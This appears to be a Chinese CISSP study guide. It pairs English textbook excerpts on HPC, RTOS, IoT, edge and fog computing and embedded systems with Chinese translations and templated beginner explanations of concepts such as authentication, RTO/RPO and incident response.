你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

问责性:问责性要求能把行为绑定到具体主体。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 41 / PDF P584

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

system. Thus, it is important to consider the collective threats and risks of the individual member components of a DCE as well as the communications interconnections between them. To secure DCE, encryption is needed for storage, transmission, and processing (such as homomorphic encryption). Also, strong multifactor authentication should be implemented. If a strict homogeneous component set is not maintained, heterogenous systems introduce their own risks, whether different OSs are in use or just different versions or patch levels of the same OS.

The more varied the DCE components, the more challenging it is to maintain consistent security configuration, enforcement, monitoring, and oversight. If the DCE is so large or broadly distributed as to cross international boundaries, then data sovereignty issues need to be addressed. High-Performance Computing (HPC) Systems High-performance computing (HPC) systems are computing platforms designed to perform complex calculations or data manipulations at extremely high speeds. Super computers and MPP solutions are common examples of HPC systems. HPC systems are used when real-time or near-real-time processing of massive data is necessary for a particular task or application.

These applications can include scientific studies, industrial research, medical analysis, societal solutions, and commercial endeavors. Many of the products and services we use today, including mobile devices and their apps, IoT devices, ICS solutions, streaming media, voice assistants, 3D modeling and rendering, and AI/ML calculations, all depend on HPC to exist. As the population of Internet and computing devices increases, as the datasets being collected continue to increase exponentially, and as new uses of that data and those devices are conceived, HPC will be in even greater demand in the future.

An HPC solution is composed of three main elements: compute resources, network capabilities, and storage capacity. Each element must be able to provide equivalent capabilities to optimize overall performance. If storage is too slow, then data cannot be fed to the application processing on the compute resources. If networking capacity is not sufficient, then users of a resource will experience latency or even a benign denial of service (DoS).

中文直译 / 整理

系统更大。 因此,必须考虑DCE各个成员组件的集体威胁和风险,以及它们之 间的通信连接。 为保障DCE安全,需要对存储、传输和处理(如同态加密)进 行加密。 同时,应实施强大的多因素身份验证。 如果未能保持严格的同质组件 集,异构系统会引入自身风险,无论使用的是不同的操作系统,还是同一操作 系统的不同版本或补丁级别。 DCE组件越多样化,保持一致的安全配置、执行、 监控和监管就越具挑战性。 如果DCE规模庞大或分布广泛,跨越了国际边界, 则需要解决数据主权问题。 高性能计算(HPC)系统 高性能计算(HPC)系统是专为以极高速度执行复杂计算或数据操作而设计的 计算平台。 超级计算机和MPP解决方案是HPC系统的常见示例。 当特定任务或 应用需要对海量数据进行实时或近实时处理时,便会使用HPC系统。 这些应用 可包括科学研究、工业研究、医疗分析、社会解决方案和商业 endeavor。 我们今天使用的许多产品和服务,包括移动设备及其应用程序、物联网设备、 ICS解决方案、流媒体、语音助手、3D建模与渲染以及AI/ML计算,都依赖于 HPC才能存在。

随着互联网和计算设备数量的增加,所收集的数据集持续呈指 数级增长,以及对这些数据和设备的新用途不断被提出,未来对HPC的需求将 更加旺盛。 高性能计算解决方案由三个主要元素组成:计算资源、网络能力和存储容量。 每个元素都必须能够提供等效的能力,以优化整体性能。 如果存储速度过慢, 则无法将数据提供给计算资源上的应用程序处理; 如果网络容量不足,则资 源的用户将经历延迟,甚至出现轻微的拒绝服务(DoS)情况。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 42 / PDF P585

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

A benign DoS occurs when a service is running on insufficient resources, when there has been an unforeseen popularity or traffic spike, or when something about the supporting system fails, such as drive loss, network link drop, or a corrupted configuration. This type of DoS occurs through no direct or intentional malign action on the part of an adversary. It is due to innocent events, unexpected conditions, or mistakes on the part of the owners/operators. For more on DoS, see Chapter 17. Real-Time Operating Systems A concept related to HPC is that of the real-time OS (RTOS). Often HPCs implement RTOS compute capability or otherwise attempt to achieve realtime processing and operations.

A real-time operating system (RTOS) is designed to process or handle data as it arrives on the system with minimal latency or delay. An RTOS is usually stored on read-only memory (ROM) and is designed to operate in a hard realtime or soft real-time condition. A hard real-time solution is for missioncritical operations where delay must be eliminated or minimized for safety, such as autonomous cars. A soft real-time solution is used when some level of modest delay is acceptable under typical or normal conditions, as it is for most consumer electronics, such as the delay between a digitizing pen and a graphics program on a computer. RTOSs can be event driven or time-sharing.

An event-driven RTOS will switch between operations or tasks based on preassigned priorities. A time-sharing RTOS will switch between operations or tasks based on clock interrupts or specific time intervals. An RTOS is often implemented when scheduling or timing is the most critical part of the task to be performed. A security concern using RTOSs is that these systems are often focused and single-purpose, leaving little room for security. They often use custom or proprietary code, which may include unknown bugs or flaws that attackers could discover. An RTOS might be overloaded or distracted with bogus datasets or process requests by malware.

When deploying or using RTOSs, use isolation and communication monitoring to minimize abuses. A beni gn DoS

中文直译 / 整理

在服务运行时发生 g on 资源不足,当出现意外的流行度或流量激增,或支持系统出现故障时,例 如磁盘丢失、网络链路中断或配置损坏。 这种类型的DoS并非源于对手的 直接或故意恶意行为,而是由无辜事件、意外状况或所有者/操作员的失误 所致。 有关DoS的更多信息,请参见第17章。 实时操作系统 与HPC相关的一个概念是实时操作系统(RTOS)。 通常,HPC会实现 RTOS计算能力,或试图实现实时处理和操作。 实时操作系统(RTOS) 的设计旨在在数据到达系统时以最小的延迟或延时进 行处理或处理。 RTOS通常存储在只读存储器(ROM)中,并设计用于硬实时 或软实时环境。 硬实时解决方案用于关键任务操作,其中必须消除或最小化延 迟以确保安全,例如自动驾驶汽车。 软实时解决方案则用于在典型或正常条件 下可接受一定程度的轻微延迟的场景,例如计算机上数位笔与图形程序之间的 延迟。 实时操作系统(RTOS)可以是事件驱动型或时间片轮转型。 事件驱动型 RTOS会根据预设的优先级在操作或任务之间切换。 时间片轮转型RTOS会根据 时钟中断或特定时间间隔在操作或任务之间切换。

当调度或定时是待执行任务 中最关键的部分时,通常会实现RTOS。 使用RTOS时的一个安全问题是,这些系统通常专注于单一用途,几乎没有余 地来实现安全性。 它们通常使用自定义或专有代码,可能包含未知的漏洞或 缺陷,攻击者可能发现这些漏洞。 RTOS可能会被虚假数据集或恶意软件发出 的进程请求压垮或干扰。 在部署或使用RTOS时,应使用隔离和通信监控来最 小化滥用行为。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

恢复时间目标 RTO:RTO 是业务或系统最多能中断多久。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

RTO 问时间:多久必须恢复。

RPO 问数据:最多丢到哪个时间点。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 43 / PDF P586

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Internet of Things Smart devices offer the user a plethora of customization options, typically through installing apps, and may take advantage of on-device or in-the-cloud machine learning (ML) processing. The products that can be labeled “smart devices” are constantly expanding and already include smartphones, tablets, music players, home assistants, extreme sport cameras, virtual reality/augmented reality (VR/AR) systems, and fitness trackers. The Internet of Things (IoT) is a class of Internet-connected smart devices that provide automation, remote control, or AI processing to appliances or devices. IoT may often perform functions similar to an embedded system, but they are different.

An IoT device is almost always a separate and distinct hardware device that is used on its own or in conjunction with an existing system (such as a smart ioT thermostat for a heating, ventilation, and airconditioning [HVAC] system). An embedded system is one where the computer control component has been integrated into the larger mechanism's structure, design, and operation, often even built into the same chassis or case. The security issues related to IoT are often about access and encryption. An IoT device was often not designed with security as a core concept or even an afterthought. This has resulted in numerous home and office network security breaches.

Additionally, once an attacker has remote access to or through an IoT device, they may be able to access other devices on the compromised network. When electing to install IoT equipment, evaluate the security of the device as well as the security reputation of the vendor. If the device does not have the ability to meet or accept your existing security baseline, then don't compromise your security just for a flashy gadget. One possible secure implementation is to deploy a distinct network segment for the IoT equipment, which is kept separate and isolated from the primary network.

This configuration is often known as three dumb routers (see www.grc.com/sn/sn-545.pdf or www.pcper.com/reviews/General-Tech/SteveGibsons-Three-Router-Solution-IOT-Insecurity). Other standard security practices are beneficial to IoT, including keeping systems patched, limiting physical and logical access, monitoring all activity, and implementing firewalls and filtering.

中文直译 / 整理

物联网 智能设备为用户提供了丰富的自定义选项,通常通过安装应用程序实现,并可 能利用设备端或云端的机器学习(ML)处理。 可称为“智能设备”的产品种 类不断扩展,目前已包括智能手机、平板电脑、音乐播放器、家庭助手、极限 运动相机、虚拟现实/增强现实(VR/AR)系统和健身追踪器。 物联网(IoT)是一类联网的智能设备,可为家用电器或设备提供自动化、远程 控制或人工智能处理功能。 物联网通常执行类似于嵌入式系统的功能,但两者 不同。 物联网设备几乎总是独立的、独特的硬件设备,可单独使用或与现有系 统(例如用于供暖、通风和空调[HVAC] 系统的智能物联网恒温器)配合使用。 嵌入式系统则是指计算机控制组件已集成到更大机制的结构、设计和运行中, 甚至通常内置在同一机箱或外壳内。 与物联网相关的安全问题通常涉及访问权限和加密。 物联网设备往往未将安全 作为核心概念,甚至未作为次要考虑因素进行设计。 这导致了大量家庭和办公 网络的安全漏洞。 此外,一旦攻击者通过物联网设备获得远程访问权限,他们 可能能够访问受感染网络上的其他设备。 在选择安装物联网设备时,应评估该 设备的安全性以及供应商的安全声誉。

如果该设备无法满足或兼容您现有的安 全基线,则不要为了一个炫目的小工具而牺牲您的安全。 一种可能的安全实现方式是为物联网设备部署一个独立的网络段,并将其与主 网络完全隔离。 这种配置通常被称为三个哑路由器(见 www.grc.com/sn/sn-545.pdf 或 www.pcper.com/reviews/General-Tech/Steve-Gibsons-Three-Router-Solution-IOT-Insecurity。 其他标准安全实践对物联网有益,包括保持系统打补丁、限制物理和逻辑访问、监控所有活 动,以及实施防火墙和过滤。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 44 / PDF P587

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Wearable technology or wearables are offshoots of smart devices and IoT devices that are specifically designed to be worn by an individual. The most common examples of wearable technology are smart watches and fitness trackers. There are an astounding number of available options, with a wide range of features and security capabilities. When selecting a wearable device, consider the security implications. Is the data being collected in a cloud service that is secured for private use or is it made publicly available? What alternative uses is the collected data going to be used for? Is the communication between the device and the collection service encrypted?

And can you delete your data and profile from the service completely if you stop using the device? Although we often associate smart devices and IoT with home or personal use, they concern every organization. This is partly because of the use of mobile devices by employees within the company's facilities and even on the organizational network. Another concern is that many IoT or networked automation devices are often used in the business environment.

This includes environmental controls, such as HVAC management, air quality control, debris and smoke detection, lighting controls, door automation, personnel and asset tracking, and consumable inventory management and auto-reordering (such as coffee, snacks, printer toner, paper, and other office supplies). Thus, both smart devices and IoT devices are potential elements of a modern business network that need appropriate security management and oversight. For some additional reading on the importance of proper security management of smart devices and IoT equipment, see “NIST Cybersecurity for IOT Program” at www.nist.gov/itl/applied-cybersecurity/nist-cybersecurity-iotprogram.

A common IoT device deployed in a business environment is a sensor. Sensors can measure just about anything, including temperature, humidity, light levels, dust particles, movement, acceleration, and air/liquid flow. Sensors can be linked with cyber-physical systems to automatically adjust or alter operations based on the sensor's measurements, such as turning on the air conditioning when the temperature rises above a threshold. Sensors can also be linked to ICS, DCS, and SCADA solutions.

中文直译 / 整理

可穿戴技术 或 可穿戴设备 是专为个人佩戴而设计的智能设备和物联网 设备的衍生品。 最常见的可穿戴技术示例是智能手表和健身追踪器。 市场上 有惊人的多种选择,具备广泛的功能和安全性能。 在选择可穿戴设备时,请 考虑其安全影响。 收集的数据是否存储在为私密使用而安全保护的云服务中, 还是被公开提供? 收集的数据将被用于哪些其他用途? 设备与数据收集服务 之间的通信是否加密? 如果您停止使用该设备,是否能完全删除您的数据和 个人资料? 尽管我们常将智能设备和物联网与家庭或个人使用联系在一起,但它们关乎每 个组织。 这部分是因为员工在公司设施内甚至组织网络上使用移动设备。 另一个担忧是,许多物联网或网络化自动化设备常用于商业环境。 这包括环境 控制,如暖通空调管理、空气质量控制、杂物和烟雾检测、照明控制、门禁自 动化、人员和资产追踪,以及耗材库存管理和自动补货(如咖啡、零食、打印 机墨粉、纸张和其他办公用品)。 因此,智能设备和物联网设备都是现代业务 网络中需要适当安全管理和监督的潜在元素。

有关智能设备和物联网设备适当 安全管理重要性的更多信息,请参阅“NIST IoT网络安全计划”: www.nist.gov/itl/applied-cybersecurity/nist-cybersecurity-iot-program。 在商业环境中部署的常见物联网设备是传感器。 传感器可以测量几乎任何事物, 包括温度、湿度、光照强度、粉尘颗粒、运动、加速度以及空气/液体流量。 传感器可以与信息物理系统连接,根据传感器的测量结果自动调整或改变操作, 例如当温度超过阈值时自动开启空调。 传感器也可以与工业控制系统(ICS)、 分布式控制系统(DCS)和监控与数据采集系统(SCADA)解决方案连接。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 45 / PDF P588

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

IoT devices—in fact, almost all hardware and software—often have insecure or weak defaults. Never assume defaults are good enough. Always evaluate acquired IoT products' setting and configuration options and make changes that optimize security and support business functions. This is especially relevant to default passwords, which must always be changed and verified. Industrial Internet of Things (IIoT) is a derivative of IoT that focuses more on industrial, engineering, manufacturing, or infrastructure level oversight, automation, management, and sensing. IIoT is an evolution of ICS and DCS that integrates cloud services to perform data collection, analysis, optimization, and automation.

Examples of IIOT include edge computing and fog computing, discussed next. Edge and Fog Computing Edge computing is a philosophy of network design where data and the compute resources are located as close as possible to optimize bandwidth use while minimizing latency. In edge computing, the intelligence and processing are contained within each device. Thus, rather than sending data to a master processing entity, each device can process its own data locally. The architecture of edge computing performs computations closer to the data source, which is at or near the edge of the network. This is distinct from performing processing in the cloud on data transmitted from remote locations.

Edge computing is often implemented as an element of IIOT solutions, but edge computing is not limited to this type of implementation. Edge computing can be viewed as the next evolution of computing concepts. Originally, computing was accomplished on core mainframe computers where applications were executed on the central system but where controlled or manipulated via thin clients. Then the distributed concept of client/server moved computing out to endpoint devices. This allowed for the execution of decentralized applications (i.e., not centrally controlled) that ran locally on the endpoint system. From there, virtualization led to cloud computing.

Cloud computing is a type of centralized application execution on remote data center systems, controlled remotely by endpoints. Finally, edge computing is the use of devices that are close to or at the endpoint where applications are centrally controlled, but the actual execution is as close to the user or network edge as possible. One potential use for edge devices is the deployment of mini-web servers by ISPs to host static or simple pages for popular sites that are located nearer to

中文直译 / 整理

物联网设备——事实上,几乎所有硬件和软件——通常具有不安全或薄弱的默 认设置。 切勿默认默认设置足够安全。 务必评估所获取的物联网产品的设置 和配置选项,并进行优化安全性和支持业务功能的更改。 这一点对于默认密 码尤其重要,必须始终更改并验证默认密码。 工业物联网(IIoT)是物联网的衍生品,更侧重于工业、工程、制造或基础 设施层面的监控、自动化、管理和感知。 IIoT是ICS和DCS的演进,通过集成 云服务来实现数据收集与分析 优化与自动化。 IIoT的示例包括边缘计算和雾计算,下文将进行讨论。 边缘计算与雾计算 边缘计算是一种网络设计哲学,其理念是将数据和计算资源尽可能靠近数据源 部署,以优化带宽使用并最小化延迟。 在边缘计算中,智能与处理能力都包含 在每个设备内部。 因此,无需将数据发送至中央处理实体,每个设备均可在其 本地处理自身数据。 边缘计算的架构在数据源附近甚至网络边缘执行计算,这 与在云端处理从远程位置传输的数据截然不同。 边缘计算常作为IIoT解决方案 的组成部分实现,但边缘计算的应用并不局限于此类实现。 边缘计算可以被视为计算概念的下一个演进阶段。

最初,计算是在核心大型机 上完成的,应用程序在中央系统上执行,但通过瘦客户端进行控制或操作。 随 后,客户端/服务器的分布式概念将计算推向了终端设备。 这使得能够在终端系 统上本地运行去中心化应用程序(即非集中控制的应用程序)。 此后,虚拟化 催生了云计算。 云计算是一种在远程数据中心系统上集中执行应用程序的模式, 由终端远程控制。 最后,边缘计算是指使用靠近或位于终端的设备,应用程序 由中心控制,但实际执行尽可能接近用户或网络边缘。 边缘设备的一个潜在用途是互联网服务提供商部署微型Web服务器,以托管位于 更靠近

小白解释

场景先行:你是公司的安全负责人,正在读第 588 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 46 / PDF P589

第 589 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

the bulk of common visitors than the main web servers. This speeds up the initial access to the front page of a popular organization's web presence, but then subsequent page visits are directed to and served by core or primary web servers that may be located elsewhere. Other examples of edge computing solutions include security systems, motion-detecting cameras, image recognition systems, IoT and IIOT devices, self-driving cars, optimized content delivery network (CDN) caching, medical monitoring devices, and videoconferencing solutions. Fog computing is another example of advanced computation architecture, which is also often used as an element in an IIOT deployment.

Fog computing relies on sensors, IoT devices, or even edge computing devices to collect data, and then transfers it back to a central location for processing. The fog computing processing location is positioned in the LAN. Thus, with fog computing, intelligence and processing are centralized in the LAN. The centralized computing power processes information gathered from the fog of disparate devices and sensors. In short, edge computing performs processing on the distributed edge systems, whereas fog computing performs centralized processing of the data collected by the distributed sensors.

Both edge and fog computing can often take advantage of or integrate the use of microcontrollers, embedded devices, static devices, cyber-physical systems, and IoT equipment. Embedded Devices and Cyber-Physical Systems An embedded system is any form of computing component added to an existing mechanical or electrical system for the purpose of providing automation, remote control, and/or monitoring. The embedded system is typically designed around a limited set of specific functions in relation to the larger product to which it is attached.

It may consist of the same components found in a typical computer system or a microcontroller (an integrated chip with onboard memory and peripheral ports).

中文直译 / 整理

大多数普通访问者位置的热门网站的静态或简单页面。 这加快了对热门组织网 站主页的初始访问,但随后的页面访问将被重定向到并由位于其他地方的核心 或主Web服务器提供服务。 其他边缘计算解决方案的例子包括安全系统、运动 检测摄像头、图像识别系统、物联网和工业物联网设备、自动驾驶汽车、优化 的内容分发网络(CDN)缓存、医疗监测设备和视频会议解决方案。 雾计算是另一种先进的计算架构示例,也常被用作IIoT部署中的一个组成部分。 雾计算依赖于传感器、物联网设备,甚至边缘计算设备来收集数据,然后将其 传输回中心位置进行处理。 雾计算的处理位置位于局域网内。 因此,通过雾计 算,智能和处理能力被集中到局域网中。 集中化的计算能力处理来自各种设备 和传感器的雾状数据。 简而言之,边缘计算在分布式的边缘系统上执行处理,而雾计算则对分布式传 感器收集的数据进行集中处理。 边缘计算和雾计算通常都可以利用或集成微控 制器、嵌入式设备、静态设备、信息物理系统和物联网设备。 嵌入式设备与信息物理系统 一个嵌入式系统是指为实现自动化、远程控制和/或监控而添加到现有机械或电 气系统中的任何计算组件。

嵌入式系统通常围绕其所属的更大产品所关联的一 组有限特定功能进行设计。 它可能由典型计算机系统中的相同组件组成,或由 微控制器(一种内置内存和外设端口的集成芯片)组成。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 589 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 47 / PDF P590

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Microcontrollers A microcontroller is similar to, but less complex, than a system on a chip, or SoC (see Chapter 11). A microcontroller may be a component of an SoC. A microcontroller is a small computer consisting of a CPU, various input/output capabilities, RAM, and often nonvolatile storage in the form of flash or ROM/PROM/EEPROM. Examples include Raspberry Pi, Arduino, and a field-programmable gate array (FPGA). Embedded systems can be a security risk because they are generally static systems, meaning that even the administrators who deploy them have no real means to alter the device's operations to address security vulnerabilities.

Some embedded systems can be updated with vendor patches, but patches are often released months after a known exploit is found in the wild. It is essential that embedded systems be isolated from the Internet and from a private production network to minimize exposure to remote exploitation, remote control, or malware compromise. Security concerns for embedded systems include the fact that most are designed to minimize cost and extraneous features. This often leads to a lack of security and difficulty with upgrades or patches. Because an embedded system may be in control of a mechanism in the physical world, a security breach could cause harm to people and property.

Static Systems Another concept similar to that of embedded systems is static systems (aka static environments). A static environment is a set of conditions, events, and surroundings that don't change. In theory, a static environment doesn't offer new or surprising elements once understood. A static IT environment is any system that is intended to remain unchanged by users and administrators. The goal is to prevent, or at least reduce, the possibility of a user implementing change that could result in reduced security or functional operation.

This is also known as a nonpersistent environment or a stateless system, as opposed to a persistent environment or stateful system, which allows changes and retains them between access events and reboots. Examples of static systems include the check-in kiosk at the airport, an ATM, and often the complimentary guest computer at a hotel or library. Those guest computers are configured to provide the user with a temporary desktop

中文直译 / 整理

